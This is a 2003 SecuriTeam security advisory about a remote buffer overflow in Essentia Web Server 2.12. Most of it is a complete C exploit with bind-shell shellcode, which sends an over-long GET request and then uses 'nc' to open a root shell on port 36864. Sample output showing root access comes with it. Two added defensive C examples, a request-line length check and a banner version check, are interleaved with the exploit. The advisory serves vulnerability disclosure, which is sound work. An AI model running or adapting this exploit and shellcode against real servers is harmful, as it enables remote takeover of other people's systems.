[EXPL] Essentia Web Server Exploit Code Released

From: SecuriTeam (support@securiteam.com)
Date: 07/06/03

    To: list@securiteam.com
    Date: 6 Jul 2003 18:41:24 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - - - - - - - -

      Essentia Web Server Exploit Code Released
    ------------------------------------------------------------------------

    SUMMARY

    The Essentia Web Server provides Enhanced Web Application and
    Communication Services. A security vulnerability in the product (a remote
    buffer overflow in request handling) allows attackers to crash the server
    and execute arbitrary code. The following exploit code can be used to test
    a system for the vulnerability.

    DETAILS

    Vulnerable systems:
     * Essentia Web Server version 2.12
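
    The exploit below triggers the overflow with a single over-long GET request line. As an added example (not the advisory's code and not Essentia's), the following C check shows the bound a server, or a proxy in front of it, should apply to a request line before any of it is copied into a fixed-size buffer: length first, then a printable-ASCII check, then the METHOD/target/version shape. MAX_REQUEST_LINE, the function names and the sample requests are assumptions constructed for this example; the padded request uses plain filler and carries no payload.

```c
/* Added example (not the advisory's code and not Essentia's): a bounded
 * HTTP request-line check applied before any copying into fixed buffers.
 * The limit and the sample requests are constructed for illustration. */
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE 1024   /* assumed policy limit, not a product setting */

enum verdict { REQ_OK = 0, REQ_TOO_LONG, REQ_BAD_BYTE, REQ_MALFORMED };

/* Inspect the first line of a raw request in place (no copy is made).
 * On REQ_OK, *target_len receives the length of the request target. */
enum verdict check_request_line(const char *req, size_t req_len, size_t *target_len)
{
    const char *nl = memchr(req, '\n', req_len);
    size_t line_len = nl ? (size_t)(nl - req) : req_len;
    size_t i, rest;
    const char *sp1, *sp2;

    /* 1. Length bound first, so an over-long line is never parsed at all. */
    if (line_len > MAX_REQUEST_LINE)
        return REQ_TOO_LONG;

    /* 2. Only printable ASCII belongs in a request line; a trailing CR is fine. */
    for (i = 0; i < line_len; i++) {
        unsigned char c = (unsigned char)req[i];
        if (c == '\r' && i + 1 == line_len)
            continue;
        if (c < 0x20 || c > 0x7e)
            return REQ_BAD_BYTE;
    }

    /* 3. Shape: METHOD SP target SP HTTP/major.minor */
    sp1 = memchr(req, ' ', line_len);
    if (sp1 == NULL)
        return REQ_MALFORMED;
    sp2 = memchr(sp1 + 1, ' ', line_len - (size_t)(sp1 + 1 - req));
    if (sp2 == NULL)
        return REQ_MALFORMED;
    rest = line_len - (size_t)(sp2 + 1 - req);
    if (rest < 5 || memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return REQ_MALFORMED;

    if (target_len)
        *target_len = (size_t)(sp2 - sp1 - 1);
    return REQ_OK;
}

/* Build a constructed over-long request of the same shape as a padded GET
 * (fixed prefix, long filler, version suffix) with filler bytes only.
 * Returns the request length, or 0 if it does not fit in out. */
size_t build_padded_request(char *out, size_t out_sz, size_t pad)
{
    const char *prefix = "GET /", *suffix = " HTTP/1.0\r\n\r\n";
    size_t plen = strlen(prefix), slen = strlen(suffix);
    size_t need = plen + pad + slen;

    if (need + 1 > out_sz)
        return 0;
    memcpy(out, prefix, plen);
    memset(out + plen, 'A', pad);
    memcpy(out + plen + pad, suffix, slen + 1);
    return need;
}

int main(void)
{
    static char big[4096];
    size_t tlen = 0, n;
    const char *good = "GET /index.html HTTP/1.0\r\n\r\n";

    printf("normal request: verdict %d, target length %zu\n",
           (int)check_request_line(good, strlen(good), &tlen), tlen);

    /* Constructed: a 2040-byte filler target, which exceeds the limit. */
    n = build_padded_request(big, sizeof big, 2040);
    printf("padded request (%zu bytes): verdict %d\n", n,
           (int)check_request_line(big, n, NULL));
    return 0;
}
```

    The length check runs before the byte check on purpose: a request that is already over the limit is rejected without scanning it, so the cost of the check does not grow with the size of the attack input.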

    Exploit:
    /*

      Title: Remote Buffer Overflow in Essentia Webserver.
      Author: By B-r00t <br00t@blueyonder.co.uk>

      Date: 04/07/2003
      Reference: http://www.essencomp.com/
      Versions: Essentia Web Server 2.12 (Linux) => VULNERABLE
      Related Info: http://www.securityfocus.com/bid/4159/info/

      Exploit: essenexploit.c
      Compile: gcc -o essenexploit essenexploit.c
          Exploit binds a r00tshell to port 36864.
          Tested on Redhat 7.2 & 7.1
          THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!

    $ telnet 0 80
    Trying 0.0.0.0...
    Connected to 0.
    Escape character is '^]'.
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Date: Fri, 04 Jul 2003 11:19:39 GMT
    Server: Essentia Web Server 2.12 (Linux)
    Accept-Ranges: bytes
    Connection: Keep-Alive
    Content-Type: text/html
    Content-Length: 757
    ETag: "f104b5-5f2-0b7940f3"
    Last-Modified: Thu, 03 Jul 2003 20:53:04 GMT

    Connection closed by foreign host.

    $ ./essenexploit 127.0.0.1
    essenexploit by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

    Number of bytes sent: 2057 / 2057

    Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
    localhost.localdomain [127.0.0.1] 36864 (?) open
    uname -a; id;
    Linux RedHat7-2 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
    uid=0(root) gid=0(root)
    groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    ENJOY!
    */

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>

    #define EXPLOIT "essenexploit"
    #define DEST_PORT 80
    #define NOP "A"

    int main ( int argc, char *argv[] )
    {

    // Vars
    int socketfd, loop, bytes;
    struct sockaddr_in dest_addr;
    char *TARGET = "TARGET";
    char buf[2100], *ptr;
    // Big fat slide NOP so ret should be good everywhere!
    char ret[] = "\xe8\xc5\xff\xbe\xe8\xc5\xff\xbe";
    char shellcode[] =
    "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
    "\x40\x89\xc3\x89\x46\x0c\x40\x89"
    "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
    "\x80\x43\xc6\x46\x10\x10\x88\x46"
    "\x08\x31\xc0\x31\xd2\x89\x46\x18"
    "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
    "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
    "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
    "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
    "\x56\x10\xb0\x66\x43\xcd\x80\x86"
    "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
    "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
    "\x80\x88\x56\x07\x89\x76\x0c\x87"
    "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
    "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68";

    printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);

    if (argc < 2)
    {
            printf ("\nUsage: %s [IP_ADDRESS]", EXPLOIT);
            printf ("\nExample: %s 10.0.0.1 \n", EXPLOIT);
            printf ("\nOn success a r00tshell will be spawned on port 36864.\n\n");
            exit (-1);
    }

    setenv (TARGET, argv[1], 1);

    // Build buf
    memset (buf, '\0', sizeof (buf));
    ptr = buf;
    strcat (buf, "GET /");

    for (loop = 1; loop < 2033-sizeof(shellcode); loop++)
    strcat (buf, NOP);

    strcat (buf, shellcode);
    strcat (buf, ret);
    strcat (buf, " HTTP/1.0");
    strcat (buf, "\x0D\x0A\x0D\x0A");

    // Socket
    if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
            perror("\nsocket error\n");
            exit (1);
            }

    dest_addr.sin_family = AF_INET;
    dest_addr.sin_port = htons(DEST_PORT);
    if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
            perror("inet_aton problems");
            exit (2);
            }

    memset( &(dest_addr.sin_zero), '\0', 8);

    if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
            perror("\nconnect failed\n");
            close (socketfd);
            exit (3);
            }

    // Wallop!
    bytes = (send (socketfd, ptr, strlen(buf), 0));
    if (bytes == -1) {
            perror("\nsend error\n");
            close (socketfd);
            exit(4);
            }
    close (socketfd);
    if (bytes < (int) strlen(buf))
    printf ("\nNetwork Error - Full Payload Was NOT sent!");

    printf ("\n\nNumber of bytes sent: %d / %d\n", bytes, (int) strlen(buf));
    printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ...!\n");
    sleep (3);
    system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
    exit (0);
    } // end main

    /*

    Shoutz: Marshal-l, Rux0r, blunt, macavity, Monkfish
      Rewd, Maz. That One Doris ... U-Know-Who-U-R!
      The doris.scriptkiddie.net posse.

    Author: B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> (c)
      "If You Can't B-r00t Then Just B#."

      ENJOY!
    */
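
    The exploit's header comment identifies the affected build from the Server header returned to a HEAD request. As an added example (not the advisory's code and not Essentia's), the C routine below does that identification on the defender's side: it extracts the Server header from a captured HTTP response and reports whether it names the exact product and version this advisory covers, which is what an inventory or vulnerability-scan check needs. The sample response is constructed from the banner quoted in the exploit's header; the function names, the 256-byte header buffer and the VULN_* constants are assumptions of this example.

```c
/* Added example (not the advisory's code): parse the Server header of a
 * captured HTTP response and flag the product version named in the advisory.
 * The sample response is constructed from the banner quoted above. */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

#define VULN_PRODUCT "Essentia Web Server"
#define VULN_MAJOR 2
#define VULN_MINOR 12  /* the only version the advisory names */

/* Copy the value of the Server header (without CRLF) into out.
 * Returns 1 if the header was found, 0 otherwise. */
int get_server_header(const char *resp, char *out, size_t out_sz)
{
    const char *p = strchr(resp, '\n');      /* skip the status line */

    while (p != NULL) {
        p++;                                  /* start of the next header line */
        if (*p == '\r' || *p == '\n' || *p == '\0')
            break;                            /* blank line: end of headers */
        if (strncasecmp(p, "Server:", 7) == 0) {
            size_t n;
            p += 7;
            while (*p == ' ' || *p == '\t')
                p++;
            n = strcspn(p, "\r\n");
            if (n >= out_sz)
                n = out_sz - 1;               /* truncate rather than overflow */
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
        p = strchr(p, '\n');
    }
    return 0;
}

/* Returns 1 when the banner names the product at exactly the advisory's
 * version, 0 for another product or version, and -1 when there is no
 * Server header or its version does not parse. */
int banner_matches_advisory(const char *resp)
{
    char server[256];
    int major, minor;
    size_t plen = strlen(VULN_PRODUCT);

    if (!get_server_header(resp, server, sizeof server))
        return -1;
    if (strncasecmp(server, VULN_PRODUCT, plen) != 0)
        return 0;
    if (sscanf(server + plen, " %d.%d", &major, &minor) != 2)
        return -1;
    return (major == VULN_MAJOR && minor == VULN_MINOR) ? 1 : 0;
}

int main(void)
{
    /* Constructed from the banner quoted in the exploit's header comment. */
    const char *resp =
        "HTTP/1.1 200 OK\r\n"
        "Date: Fri, 04 Jul 2003 11:19:39 GMT\r\n"
        "Server: Essentia Web Server 2.12 (Linux)\r\n"
        "Content-Length: 757\r\n"
        "\r\n";
    char server[256];

    if (get_server_header(resp, server, sizeof server))
        printf("Server header: %s\n", server);
    printf("matches advisory version: %d\n", banner_matches_advisory(resp));
    return 0;
}
```

    The version comparison is numeric rather than a string match so that a banner such as "2.2" is not mistaken for "2.12"; only the version the advisory names is flagged, since the advisory says nothing about other releases.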

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:br00t@blueyonder.co.uk>
    B-r00t.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.

